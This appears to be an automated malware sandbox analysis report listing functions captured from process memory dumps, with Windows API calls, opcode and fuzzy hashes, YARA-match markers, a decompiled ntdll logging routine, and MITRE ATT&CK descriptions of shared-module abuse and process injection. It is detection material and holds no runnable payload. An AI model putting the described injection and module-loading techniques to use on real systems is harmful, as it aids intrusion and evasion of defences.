Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04C9986A

Memory Dump Source

Source File: 00000011.00000002.523223721.0000000004C30000.00000040.00000001.sdmp, Offset: 04C30000, based on PE: true

Associated: 00000011.00000002.524633695.0000000004D4B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.524645016.0000000004D4F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: df6f4b9921bf70f5e5653878705ad1f5227a348978d7f82ae9e8b128c2c05ed0
Instruction ID: 23148912c38018e9af9bf58c4b1e51c51429036c9a2a08c7ec551392ae37258c
Opcode Fuzzy Hash: df6f4b9921bf70f5e5653878705ad1f5227a348978d7f82ae9e8b128c2c05ed0
Instruction Fuzzy Hash: BD9002B120100623F11161594504707011B97D028DFE1C412A0425598D9A96D962B161

Uniqueness

Uniqueness Score: -1.00%

Function 04C995D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04C995DA

Memory Dump Source

Source File: 00000011.00000002.523223721.0000000004C30000.00000040.00000001.sdmp, Offset: 04C30000, based on PE: true

Associated: 00000011.00000002.524633695.0000000004D4B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.524645016.0000000004D4F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 35dcb2053976fc2370ef0d35e3836850083cf519e4db4151140e034850ff727f
Instruction ID: ac80f2818a1fda4188c185d925ec0576f98c7e963c602de9545b82b6eb0c1306
Opcode Fuzzy Hash: 35dcb2053976fc2370ef0d35e3836850083cf519e4db4151140e034850ff727f
Instruction Fuzzy Hash: 799002E120200213610571594414616411B97E024DBA1C021E10155D0DC965D8A17165

Uniqueness

Uniqueness Score: -1.00%

Function 04C999A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04C999AA

Memory Dump Source

Source File: 00000011.00000002.523223721.0000000004C30000.00000040.00000001.sdmp, Offset: 04C30000, based on PE: true

Associated: 00000011.00000002.524633695.0000000004D4B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.524645016.0000000004D4F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f2c3e5c1374132880504e3ad3181c72c71292133b173a14bab7c3e4f213eca58
Instruction ID: 71077915487ca4632a836647f676a2c53e1b38b5cfe2f67818aae3a19d032a23
Opcode Fuzzy Hash: f2c3e5c1374132880504e3ad3181c72c71292133b173a14bab7c3e4f213eca58
Instruction Fuzzy Hash: CA9002E134100652F10061594414B060117D7E134DFA1C015E1065594D8A59DC627166

Uniqueness

Uniqueness Score: -1.00%

Function 04C99540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04C9954A

Memory Dump Source

Source File: 00000011.00000002.523223721.0000000004C30000.00000040.00000001.sdmp, Offset: 04C30000, based on PE: true

Associated: 00000011.00000002.524633695.0000000004D4B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.524645016.0000000004D4F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 31aa8d5efba8f97bee4be1518074f3f1226ccc58ed4b1209aebbf8e8e9c46b78
Instruction ID: 5d83952527ce3397d79d72b5a3ec18b430eddc61fa333b9fd0eee04638f9508e
Opcode Fuzzy Hash: 31aa8d5efba8f97bee4be1518074f3f1226ccc58ed4b1209aebbf8e8e9c46b78
Instruction Fuzzy Hash: 659002A5211002132105A5590704507015797D539D3A1C021F1016590CDA61D8716161

Uniqueness

Uniqueness Score: -1.00%

Function 04C99910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04C9991A

Memory Dump Source

Source File: 00000011.00000002.523223721.0000000004C30000.00000040.00000001.sdmp, Offset: 04C30000, based on PE: true

Associated: 00000011.00000002.524633695.0000000004D4B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.524645016.0000000004D4F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f5c1eb5961c874b20d3b0d9a3558de45640d690078258d018c5022d6abbff09b
Instruction ID: 63b4ea3b68bfade3d93f172e2179a648d69dca7662fb979426209cc038ef7d17
Opcode Fuzzy Hash: f5c1eb5961c874b20d3b0d9a3558de45640d690078258d018c5022d6abbff09b
Instruction Fuzzy Hash: B59002F120100612F14071594404746011797D034DFA1C011A5065594E8A99DDE576A5

Uniqueness

Uniqueness Score: -1.00%

Function 04C996D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04C996DA

Memory Dump Source

Source File: 00000011.00000002.523223721.0000000004C30000.00000040.00000001.sdmp, Offset: 04C30000, based on PE: true

Associated: 00000011.00000002.524633695.0000000004D4B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.524645016.0000000004D4F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e0ed5ca5504b92f25dfa2cb39688a20d8b1fb5abc00607c1470e7c814ab220c9
Instruction ID: 29889c36b4d173f1a3f0b3b4fe934ec613a9014ac78c968f879b1e4ef2a684a0
Opcode Fuzzy Hash: e0ed5ca5504b92f25dfa2cb39688a20d8b1fb5abc00607c1470e7c814ab220c9
Instruction Fuzzy Hash: 139002B120100A52F10061594404B46011797E034DFA1C016A0125694D8A55D8617561

Uniqueness

Uniqueness Score: -1.00%

Function 04C996E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04C996EA

Memory Dump Source

Source File: 00000011.00000002.523223721.0000000004C30000.00000040.00000001.sdmp, Offset: 04C30000, based on PE: true

Associated: 00000011.00000002.524633695.0000000004D4B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.524645016.0000000004D4F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: cebb59b46bfe7dab900f5cee48dc57f0357719ff1c2fdee6b28f8c5d989c838f
Instruction ID: 932e53da20fabd7a49bb42c7948366fd3dfb05b5be342c2f566c1345edc55819
Opcode Fuzzy Hash: cebb59b46bfe7dab900f5cee48dc57f0357719ff1c2fdee6b28f8c5d989c838f
Instruction Fuzzy Hash: DF9002B120108A12F1106159840474A011797D034DFA5C411A4425698D8AD5D8A17161

Uniqueness

Uniqueness Score: -1.00%

Function 04C99A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04C99A5A

Memory Dump Source

Source File: 00000011.00000002.523223721.0000000004C30000.00000040.00000001.sdmp, Offset: 04C30000, based on PE: true

Associated: 00000011.00000002.524633695.0000000004D4B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.524645016.0000000004D4F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9af999c14dc7f1f818f1dbc3b8334aa1f336cbae434942c0830dcb57254a3c4c
Instruction ID: 0072e6171845b6b5dabd29681e6909c4a1dd44727f78823041bcec11597987fd
Opcode Fuzzy Hash: 9af999c14dc7f1f818f1dbc3b8334aa1f336cbae434942c0830dcb57254a3c4c
Instruction Fuzzy Hash: A99002A121180252F20065694C14B07011797D034FFA1C115A0155594CCD55D8716561

Uniqueness

Uniqueness Score: -1.00%

Function 04C99650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04C9965A

Memory Dump Source

Source File: 00000011.00000002.523223721.0000000004C30000.00000040.00000001.sdmp, Offset: 04C30000, based on PE: true

Associated: 00000011.00000002.524633695.0000000004D4B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.524645016.0000000004D4F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c37152cc6250b995434e19b728f860d53e632697b6f939f90512fa719073751f
Instruction ID: 97c8a9d0758ed0c5f317e6d8c2c0b546e9285bd067404f1b74d7f1edf158bbd0
Opcode Fuzzy Hash: c37152cc6250b995434e19b728f860d53e632697b6f939f90512fa719073751f
Instruction Fuzzy Hash: B99002B120504A52F14071594404A46012797D034DFA1C011A00656D4D9A65DD65B6A1

Uniqueness

Uniqueness Score: -1.00%

Function 04C99660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04C9966A

Memory Dump Source

Source File: 00000011.00000002.523223721.0000000004C30000.00000040.00000001.sdmp, Offset: 04C30000, based on PE: true

Associated: 00000011.00000002.524633695.0000000004D4B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.524645016.0000000004D4F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5beaad949d220fd29094187518a45de61484357cfbdccb6cc05948b7322eefe3
Instruction ID: bf985a61a0d1439e6bc7748c2c2376a440669fa79d13f9e0027685fbd155dad6
Opcode Fuzzy Hash: 5beaad949d220fd29094187518a45de61484357cfbdccb6cc05948b7322eefe3
Instruction Fuzzy Hash: 549002B120100A12F1807159440464A011797D134DFE1C015A0026694DCE55DA6977E1

Uniqueness

Uniqueness Score: -1.00%

Function 04C99FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04C99FEA

Memory Dump Source

Source File: 00000011.00000002.523223721.0000000004C30000.00000040.00000001.sdmp, Offset: 04C30000, based on PE: true

Associated: 00000011.00000002.524633695.0000000004D4B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.524645016.0000000004D4F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5e52c183c2ed2d6999327bbc80bd9f6628430ead5cd84a512f14883ac9c1ef6f
Instruction ID: 95e50ab4aff33f4d89e1cf7f08c64aee2f17e28c414c74d972386e26d35a1529
Opcode Fuzzy Hash: 5e52c183c2ed2d6999327bbc80bd9f6628430ead5cd84a512f14883ac9c1ef6f
Instruction Fuzzy Hash: 0A9002B131114612F11061598404706011797D124DFA1C411A0825598D8AD5D8A17162

Uniqueness

Uniqueness Score: -1.00%

Function 04C99780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04C9978A

Memory Dump Source

Source File: 00000011.00000002.523223721.0000000004C30000.00000040.00000001.sdmp, Offset: 04C30000, based on PE: true

Associated: 00000011.00000002.524633695.0000000004D4B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.524645016.0000000004D4F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 658a65661de16e66779edbf4196730aeae87742282942136d37a867a4ceff266
Instruction ID: 28201656ec5571076c3e9f220d6d44094299ecd98bea4e31f89d8bae4208ff6a
Opcode Fuzzy Hash: 658a65661de16e66779edbf4196730aeae87742282942136d37a867a4ceff266
Instruction Fuzzy Hash: 389002A921300212F1807159540860A011797D124EFE1D415A0016598CCD55D8796361

Uniqueness

Uniqueness Score: -1.00%

Function 04C99710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04C9971A

Memory Dump Source

Source File: 00000011.00000002.523223721.0000000004C30000.00000040.00000001.sdmp, Offset: 04C30000, based on PE: true

Associated: 00000011.00000002.524633695.0000000004D4B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.524645016.0000000004D4F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5c953b284469490cb80d4bab75eebb5a88f583930055466d838a4319597555ed
Instruction ID: c5f3ce56b9428732868af98e08d5372f1750d3401f2ad1afffa42953451fb8f5
Opcode Fuzzy Hash: 5c953b284469490cb80d4bab75eebb5a88f583930055466d838a4319597555ed
Instruction Fuzzy Hash: AD9002B120100612F10065995408646011797E034DFA1D011A5025595ECAA5D8A17171

Uniqueness

Uniqueness Score: -1.00%

Function 00B472F0, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 00B47398

Strings

wininet.dll, xrefs: 00B4734E, 00B47357
net.dll, xrefs: 00B47361, 00B473E7, 00B473BF, 00B473CB, 00B473F3

Memory Dump Source

Source File: 00000011.00000002.520482088.0000000000B30000.00000040.00020000.sdmp, Offset: 00B30000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 4109aba29892d9a41d8a8ea6d4bc3df00a566ab45680f5712ed041a14dd189d6
Instruction ID: 35cf0f498581d8fa3a3938a84512aaf87899738ca771604f53056f9ecd96337e
Opcode Fuzzy Hash: 4109aba29892d9a41d8a8ea6d4bc3df00a566ab45680f5712ed041a14dd189d6
Instruction Fuzzy Hash: 0131B0B6541604ABC711DF68C8A1FABB7F8EF48700F00855DFA1A9B241D730A646DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00B472E6, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 83sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 00B47398

Strings

wininet.dll, xrefs: 00B4734E, 00B47357
net.dll, xrefs: 00B47361, 00B473BF, 00B473CB

Memory Dump Source

Source File: 00000011.00000002.520482088.0000000000B30000.00000040.00020000.sdmp, Offset: 00B30000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: bf1d5d5734a5e64824b6a516e40b8a4e9afad9a01973cbb77550ae310feb90f1
Instruction ID: 0d1acce24bd0614e6cfca1332da76b2abdec8c11f9d76d9a4cdc3fcb9c8f1a45
Opcode Fuzzy Hash: bf1d5d5734a5e64824b6a516e40b8a4e9afad9a01973cbb77550ae310feb90f1
Instruction Fuzzy Hash: DE2104B2645200ABD711DF68C8A1FABBBF4FF48700F10815DFA1D9B281D770A946DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00B488D2, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 27memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00B33B93), ref: 00B4890D

Strings

.z`, xrefs: 00B488FC, 00B48908

Memory Dump Source

Source File: 00000011.00000002.520482088.0000000000B30000.00000040.00020000.sdmp, Offset: 00B30000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 0bb6cfa7a34bb4dd9619f16e4da0051428f94c0b7b4bffa01469112dba252c21
Instruction ID: ff5e78d33c3b68aac77b8e3660a68bf2d7e7559adbf8938d45e2f6b5f7281549
Opcode Fuzzy Hash: 0bb6cfa7a34bb4dd9619f16e4da0051428f94c0b7b4bffa01469112dba252c21
Instruction Fuzzy Hash: D6E06DB56002057FE719DF94DC49E977798EF88350F008A99FD1C5B651D630E960CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B488E0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00B33B93), ref: 00B4890D

Strings

.z`, xrefs: 00B488FC, 00B48908

Memory Dump Source

Source File: 00000011.00000002.520482088.0000000000B30000.00000040.00020000.sdmp, Offset: 00B30000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction ID: 8f2025fd55551da632ce28e8dd4f9fa174e10327444693e5c237cdf8d2ea78fc
Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: 89E04FB12002087BD718DF59DC49EA777ACEF88750F014554FD0857241C630F910CAF0

Uniqueness

Uniqueness Score: -1.00%

Function 00B37290, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 00B372EA
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 00B3730B

Memory Dump Source

Source File: 00000011.00000002.520482088.0000000000B30000.00000040.00020000.sdmp, Offset: 00B30000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 3e45670befda317f76231e839ee3ec830ac1bb819c56bc285ac06765e38e55f1
Instruction ID: 132b325c4bff224399371427c407dde38a796d3cb92aa1a295a38a2529c3613e
Opcode Fuzzy Hash: 3e45670befda317f76231e839ee3ec830ac1bb819c56bc285ac06765e38e55f1
Instruction Fuzzy Hash: EF018F71A8022876E721AA949C03FBE77AC9B00B51F140198FF04BA1C1EAE46A0647F6

Uniqueness

Uniqueness Score: -1.00%

Function 00B37263, Relevance: 3.0, APIs: 2, Instructions: 40threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 00B372EA
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 00B3730B

Memory Dump Source

Source File: 00000011.00000002.520482088.0000000000B30000.00000040.00020000.sdmp, Offset: 00B30000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: e4ed60e49faf2e329894cd13f7d4401b445ff0e3a96ded054f12627992c73196
Instruction ID: 93746e03958e00929d6a9f8d29fc40c86a5f39131699f23f8bd0a0ec30aa5c89
Opcode Fuzzy Hash: e4ed60e49faf2e329894cd13f7d4401b445ff0e3a96ded054f12627992c73196
Instruction Fuzzy Hash: E3F0E271BC92247AE73296945C03FBA77989B41F10F25009AFF04FA1C1EAA46A1246F9

Uniqueness

Uniqueness Score: -1.00%

Function 00B48A31, Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,00B3CFD2,00B3CFD2,?,00000000,?,?), ref: 00B48A70

Memory Dump Source

Source File: 00000011.00000002.520482088.0000000000B30000.00000040.00020000.sdmp, Offset: 00B30000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 06eeb676ffc238fba7826ebb45b75edcff59df0557e7d9ffd74f519ea1162436
Instruction ID: 5cef17b339c0b10a5de3da3c116161d09843e08488d7d986c61ef955ca135588
Opcode Fuzzy Hash: 06eeb676ffc238fba7826ebb45b75edcff59df0557e7d9ffd74f519ea1162436
Instruction Fuzzy Hash: 5E0126B52042546FCB14DF54AC89DE73BACEF40310F144A8AFC4917202C974EA14C7F0

Uniqueness

Uniqueness Score: -1.00%

Function 00B39B50, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00B39BC2

Memory Dump Source

Source File: 00000011.00000002.520482088.0000000000B30000.00000040.00020000.sdmp, Offset: 00B30000, based on PE: false

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: b151b7aefe362f9f53239ff94c441e7fc7ff50d12aa80511d0004ed55a8a3314
Instruction ID: 19d28b9421714435d7ffa139df3fe00adc5f712050b0bdcf99f7121f613062e8
Opcode Fuzzy Hash: b151b7aefe362f9f53239ff94c441e7fc7ff50d12aa80511d0004ed55a8a3314
Instruction Fuzzy Hash: 42011EB5D4020DABDF10DBA5EC42F9EB7B89B54308F1041D5E91897241F671EB18DB91

Uniqueness

Uniqueness Score: -1.00%

Function 00B48950, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00B489A4

Memory Dump Source

Source File: 00000011.00000002.520482088.0000000000B30000.00000040.00020000.sdmp, Offset: 00B30000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction ID: 5cae90ce4dab01fc2f18b47f0d61392e4f0b3db3fa79cd9fd813279df95a4a37
Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction Fuzzy Hash: A301AFB2210108BBCB58DF89DC80EEB77ADAF8C754F158258BA0DA7241C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00B47420, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,00B3CD00,?,?), ref: 00B4745C

Memory Dump Source

Source File: 00000011.00000002.520482088.0000000000B30000.00000040.00020000.sdmp, Offset: 00B30000, based on PE: false

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 34a1b1dcf166439898ace659775bf258f25437e47bcb71fafeaaa03b101821b9
Instruction ID: e2437c75ddb30168124590ec81c2a5fc84633d021db5c939f421635d3a2c9d26
Opcode Fuzzy Hash: 34a1b1dcf166439898ace659775bf258f25437e47bcb71fafeaaa03b101821b9
Instruction Fuzzy Hash: 31E06D333852143AE220659DAC03FA7B2DCCB91B20F540066FA0DEA2C1D995F90142A4

Uniqueness

Uniqueness Score: -1.00%

Function 00B488A0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00B43546,?,00B43CBF,00B43CBF,?,00B43546,?,?,?,?,?,00000000,00000000,?), ref: 00B488CD

Memory Dump Source

Source File: 00000011.00000002.520482088.0000000000B30000.00000040.00020000.sdmp, Offset: 00B30000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction ID: 3ae1b6561d6167d216dad33e17bf857b7f60d38e6d276cc34190020adfc0532f
Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction Fuzzy Hash: 0FE012B1200208ABDB18EF99DC45EA777ACAF88650F118598BE086B242C630F910CAB0

Uniqueness

Uniqueness Score: -1.00%

Function 00B48A40, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,00B3CFD2,00B3CFD2,?,00000000,?,?), ref: 00B48A70

Memory Dump Source

Source File: 00000011.00000002.520482088.0000000000B30000.00000040.00020000.sdmp, Offset: 00B30000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction ID: 0043e1c57dac9ed16ab5f04a266bb806c179f1d7d010aa48f65490b121ced083
Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction Fuzzy Hash: EDE01AB12002086BDB14DF49DC85EE737ADAF88650F018154BE0867241C930F9108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 00B3D440, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,00B37C93,?), ref: 00B3D46B

Memory Dump Source

Source File: 00000011.00000002.520482088.0000000000B30000.00000040.00020000.sdmp, Offset: 00B30000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 5941c0a5fdae3851d709d72054521dfe57e6e64fcf16e108bb6ccc3ba138142f
Instruction ID: 8a1eb4aea50aec4dc2767c6962b02dc540ddf0f36297caac29814266b8abf806
Opcode Fuzzy Hash: 5941c0a5fdae3851d709d72054521dfe57e6e64fcf16e108bb6ccc3ba138142f
Instruction Fuzzy Hash: D8D0A7717903083BE610FAA8DC03F2632CC9B44B00F4940A4F949E73C3D960F5004171

Uniqueness

Uniqueness Score: -1.00%

Function 04C9967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04C99694

Memory Dump Source

Source File: 00000011.00000002.523223721.0000000004C30000.00000040.00000001.sdmp, Offset: 04C30000, based on PE: true

Associated: 00000011.00000002.524633695.0000000004D4B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.524645016.0000000004D4F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 262b5b594e7e12458cd1b76c9dd7c6cc8cb0cce22b60d1d63a39c3d067340777
Instruction ID: ca7915b08c01192e267c772392607ee56a8e1d5623cee07a07fba845d1ea4181
Opcode Fuzzy Hash: 262b5b594e7e12458cd1b76c9dd7c6cc8cb0cce22b60d1d63a39c3d067340777
Instruction Fuzzy Hash: 75B02BF18010C2D5FB00D760060C7173A1277C0308F22C051D1030280A0738D090F1B1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 04CEFDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E04CEFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E04C9CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E04CE5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E04CE5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x04cefdda
0x04cefde2
0x04cefde5
0x04cefdec
0x04cefdfa
0x04cefdff
0x04cefe0a
0x04cefe0f
0x04cefe17
0x04cefe1e
0x04cefe19
0x04cefe19
0x04cefe19
0x04cefe20
0x04cefe21
0x04cefe22
0x04cefe25
0x04cefe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04CEFDFA

Strings

RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04CEFE01
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04CEFE2B

Memory Dump Source

Source File: 00000011.00000002.523223721.0000000004C30000.00000040.00000001.sdmp, Offset: 04C30000, based on PE: true

Associated: 00000011.00000002.524633695.0000000004D4B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.524645016.0000000004D4F000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: 2241583ee3ef95f7ac0792f359c092e303e9ed1768c30b2e9ff70e751a48c32d
Instruction ID: 72200b6b1b2b721bf49cd3e87f3f5bd567d2f4d7ad4b847aa784d19894352b88
Opcode Fuzzy Hash: 2241583ee3ef95f7ac0792f359c092e303e9ed1768c30b2e9ff70e751a48c32d
Instruction Fuzzy Hash: 4BF0F676200201BFEA201A86DC06F33BB6BEB84774F140358F628561D1EA62FC3096F4

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
